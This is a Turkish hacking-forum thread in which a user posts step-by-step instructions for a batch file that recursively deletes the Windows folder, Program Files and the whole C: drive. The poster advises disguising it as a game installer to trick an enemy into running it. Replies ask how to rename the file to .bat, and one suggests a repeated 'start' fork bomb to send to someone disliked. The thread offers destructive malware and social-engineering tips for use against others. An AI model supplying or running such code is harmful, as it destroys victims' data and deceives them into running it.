30 sn de wirüs yapın ...

ROLAT

Katılımcı Üye
12 Kas 2006
885
5
bende bilmiyom
Açıklama:

1.Notepad 'i açın.

2.Notepad in içine şunları yazın:
-----------------------------------------
@echo off

C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*

@echo off

C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*

@echo off

C:\WINDOWS\COMMAND\deltree /y c:\*.*

@echo off

cls

cls

@echo .:eni salak formatı yedin::.

@echo off

--------------------------------------------
3.Notepad i kapatıp belgeyi kaydedin.

4.Uzantısını .txt den .bat a çevirin.

5.Hazır.

Açıklama:

Yaptıktan sonra dosyaya sakın tıklamayın.

Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.

Not:%100 ÇALIŞIYO

Windows un önemli bi kaç dosyasını siliyor ve sonra "seni salak formatı yedin yazıyor".

Peki bunu düşmanıma nasıl yediririm derseniz:

dosyanın adını değiştirin.(mesela:fifa_2005_stream_install)

burak_serseri

Yeni üye
25 Ara 2006
37
0
ya nasıl olmuyo mallar şimdi bunu kaydederken orda yeni klsör filan diyo o yeni klasör yazan yeri sil yani isim sen ver isim yazma bat. yaz olmuosa .bat ya kesin ve kesin oluyo %10000000000000000000000

unnamedsoldier

Yeni üye
14 Nis 2007
3
0
Arkadaşlar herşey güzel hoş ta şu üslubunuza bir dikkat etsek,emeğine sağlık kardeşş çok eski bu mazisi uzun ama emeğine teşekkürler kanka,.bat a çeviremeyen arkadaşlar bence siz hackerliğe değilde bilgisayarın a sını b sini öğrenmeye çalışın arkadaşlar hepinize saygı ve sevgiler.

zech

Yeni üye
14 Nis 2007
2
0
ya usta bat. çevirmek nasıl oluor anlatır mısın? ¿ kademeli bir şekilde.. ¿

oyle_dema

Yeni üye
15 Nis 2007
1
0
ya arkadaşlar ben dosyayı bat a çeviremiyorum uzantısı dosyaadı.bat.txt diye çıkıyo nasıl değiştiricem

bukaz

Yeni üye
15 Nis 2007
1
0
ya millet arkadaşın dedi gibi bat..txt veya .bat yazdıında olmuo ..:SS:S: çok acayip bişi yardım dersseniz sewinirz .ss

sagapal

Yeni üye
14 Nis 2007
10
0
ya önce bişe soracam notepad dediğiniz sey not defterimii yoksa wordpad mı?? :S:S:S

ShImarIcIKü

Yeni üye
15 Nis 2007
1
0
arkdaşlar ben sıze şoyle soyluyeyım notdefterı acın sonra en az 5000 fılan
yapınız;)
aynı bu şekılde yazın

start
start
start
start
start
ne kadar cok yaparsanız o kadar cok etkılı olur ve bunu gıcık oldugunuz bırıne şoyle gonderın [gıcık adamın ısmı] kız adresı amca oglu :D:D:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.